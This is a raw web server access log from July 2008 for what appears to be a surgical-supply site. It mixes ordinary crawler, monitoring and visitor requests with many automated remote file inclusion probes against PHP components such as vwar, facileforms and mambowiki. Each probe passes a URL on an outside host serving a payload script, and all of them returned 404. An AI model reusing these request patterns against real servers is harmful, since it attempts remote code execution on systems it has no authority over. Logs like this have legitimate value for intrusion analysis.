216.246.28.208 - - [28/Jul/2008:01:25:03 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
66.249.67.180 - - [28/Jul/2008:01:23:17 -0400] "GET /logs/access_log.Q107062800 HTTP/1.1" 200 2644594 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:01:25:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.28.208 - - [28/Jul/2008:01:26:13 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:14 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:14 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:14 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:14 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:50 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:52 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:26:52 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:27:24 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
70.85.102.116 - - [28/Jul/2008:01:27:30 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
216.246.28.208 - - [28/Jul/2008:01:28:36 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:28:58 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:28:58 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:28:58 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
216.246.28.208 - - [28/Jul/2008:01:29:18 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
209.59.12.99 - - [28/Jul/2008:01:30:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.28.208 - - [28/Jul/2008:01:31:33 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://forum.tourdumonde.be//includes/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
65.214.44.28 - - [28/Jul/2008:01:32:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:01:32:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:01:32:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:01:32:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
209.59.12.99 - - [28/Jul/2008:01:35:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:01:37:16 -0400] "GET /logs/access_log.Q108072200 HTTP/1.1" 200 3165337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:01:40:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:01:45:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:01:50:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:01:54:02 -0400] "GET /logs/access_log.Q108051000 HTTP/1.1" 200 707775 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:01:55:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:00:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.129.163.120 - - [28/Jul/2008:02:04:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
220.129.163.120 - - [28/Jul/2008:02:04:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
220.129.163.120 - - [28/Jul/2008:02:04:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
220.129.163.120 - - [28/Jul/2008:02:04:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
209.59.12.99 - - [28/Jul/2008:02:05:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:02:09:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F3D9B2070D2A700F635001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.246.53.83 - - [28/Jul/2008:02:10:34 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
216.246.53.83 - - [28/Jul/2008:02:10:34 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
209.59.12.99 - - [28/Jul/2008:02:10:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.100.202 - - [28/Jul/2008:02:10:50 -0400] "GET /logs/error_log.Q108012300//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mizunobr.web.terra.com.br/derf/vid.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
65.98.100.202 - - [28/Jul/2008:02:10:50 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mizunobr.web.terra.com.br/derf/vid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
65.98.100.202 - - [28/Jul/2008:02:10:54 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mizunobr.web.terra.com.br/derf/vid.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
87.106.98.71 - - [28/Jul/2008:02:12:17 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
87.106.98.71 - - [28/Jul/2008:02:12:17 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.106.191.163 - - [28/Jul/2008:02:15:05 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
87.106.191.163 - - [28/Jul/2008:02:15:05 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:02:15:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:20:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:02:22:48 -0400] "GET /logs/error_log.Q107090100 HTTP/1.1" 200 22588 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:02:25:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:31:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:02:33:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FEF2053D2F100862503V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:02:36:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:41:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:46:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:02:43:45 -0400] "GET /logs/access_log.Q107071100 HTTP/1.1" 200 3422017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:02:51:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:02:56:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:02:57:07 -0400] "GET /logs/access_log.Q108052600 HTTP/1.1" 200 1049461 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:03:01:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.198.180.10 - - [28/Jul/2008:03:02:29 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:03:02:31 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.191.163 - - [28/Jul/2008:03:05:49 -0400] "GET /logs/error_log.Q108031900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:03:06:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.191.163 - - [28/Jul/2008:03:06:44 -0400] "GET /logs/error_log.Q108040800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
66.249.67.180 - - [28/Jul/2008:03:10:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FEF2054024100812503V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:03:11:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.30.95.98 - - [28/Jul/2008:03:13:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
119.30.95.98 - - [28/Jul/2008:03:13:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
119.30.95.98 - - [28/Jul/2008:03:14:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
119.30.95.98 - - [28/Jul/2008:03:14:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.169.186.162 - - [28/Jul/2008:03:15:48 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
81.169.186.162 - - [28/Jul/2008:03:15:48 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
81.169.186.162 - - [28/Jul/2008:03:15:48 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
81.169.186.162 - - [28/Jul/2008:03:15:48 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
209.59.12.99 - - [28/Jul/2008:03:16:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.169.158.65 - - [28/Jul/2008:03:17:01 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
81.169.158.65 - - [28/Jul/2008:03:17:02 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
81.169.158.65 - - [28/Jul/2008:03:17:04 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
81.169.158.65 - - [28/Jul/2008:03:17:04 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
66.249.67.180 - - [28/Jul/2008:03:21:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FEF2053624100812503V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:03:21:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:03:26:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:03:31:17 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.67.180 - - [28/Jul/2008:03:31:17 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [28/Jul/2008:03:31:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.179 - - [28/Jul/2008:03:35:10 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.179 - - [28/Jul/2008:03:35:11 -0400] "GET /logs/access_log.Q107102100 HTTP/1.0" 200 1066929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [28/Jul/2008:03:36:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.186.78.5 - - [28/Jul/2008:03:37:39 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://67.223.229.149/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.63"
208.186.78.5 - - [28/Jul/2008:03:37:40 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://67.223.229.149/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.63"
66.249.67.180 - - [28/Jul/2008:03:39:19 -0400] "GET /logs/access_log.Q108042000 HTTP/1.1" 200 903723 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:03:41:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:03:47:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:03:47:12 -0400] "GET /logs/access_log.Q108050700 HTTP/1.1" 200 4724462 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:03:52:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.2.136 - - [28/Jul/2008:03:57:35 -0400] "GET /logs/@scanhttp://h-pro.ru/lang/inc? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
61.47.2.136 - - [28/Jul/2008:03:57:37 -0400] "GET /@scanhttp://h-pro.ru/lang/inc? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:03:57:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:04:01:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F2ECF2E5062E1008C7503J+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:04:02:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:04:07:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:04:12:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:04:13:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FCF215AA2D100A0B503N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:04:17:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:04:22:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.20.138.101 - - [28/Jul/2008:04:23:20 -0400] "GET /logs/index2.php?x=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:04:23:20 -0400] "GET /index2.php?x=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
121.31.96.115 - - [28/Jul/2008:04:24:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.31.96.115 - - [28/Jul/2008:04:24:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.31.96.115 - - [28/Jul/2008:04:24:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.31.96.115 - - [28/Jul/2008:04:24:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.67.180 - - [28/Jul/2008:04:24:48 -0400] "GET /logs/access_log.Q108041300 HTTP/1.1" 200 1329409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.47.2.136 - - [28/Jul/2008:04:27:07 -0400] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
61.47.2.136 - - [28/Jul/2008:04:27:08 -0400] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:04:28:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.99.30.67 - - [28/Jul/2008:04:29:30 -0400] "GET /Includes/ HTTP/1.0" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
205.178.184.152 - - [28/Jul/2008:04:31:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
205.178.184.152 - - [28/Jul/2008:04:31:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.99.30.66 - - [28/Jul/2008:04:31:41 -0400] "GET /images/ HTTP/1.0" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
64.26.63.17 - - [28/Jul/2008:04:32:42 -0400] "GET /logs/home.php?pagina=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:04:32:42 -0400] "GET /home.php?pagina=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
217.20.138.101 - - [28/Jul/2008:04:32:57 -0400] "GET /logs/index.phpmain.php?x=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:04:32:57 -0400] "GET /index.phpmain.php?x=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:04:33:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.20.138.101 - - [28/Jul/2008:04:33:29 -0400] "GET /logs/index.phpmain.php?x=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:04:33:29 -0400] "GET /index.phpmain.php?x=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
66.249.67.180 - - [28/Jul/2008:04:35:29 -0400] "GET /logs/access_log.Q108071300 HTTP/1.1" 200 743450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.26.63.17 - - [28/Jul/2008:04:35:55 -0400] "GET /logs/home.php?pagina=http://pienna.co.cc/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:04:35:55 -0400] "GET /home.php?pagina=http://pienna.co.cc/id.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
75.127.70.16 - - [28/Jul/2008:04:37:44 -0400] "GET /logs//errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
75.127.70.16 - - [28/Jul/2008:04:37:44 -0400] "GET //errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
209.59.12.99 - - [28/Jul/2008:04:38:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:04:43:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:04:45:11 -0400] "GET /logs/access_log.Q107111300 HTTP/1.1" 200 3141199 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:04:48:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [28/Jul/2008:04:53:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.78.146 - - [28/Jul/2008:04:55:17 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
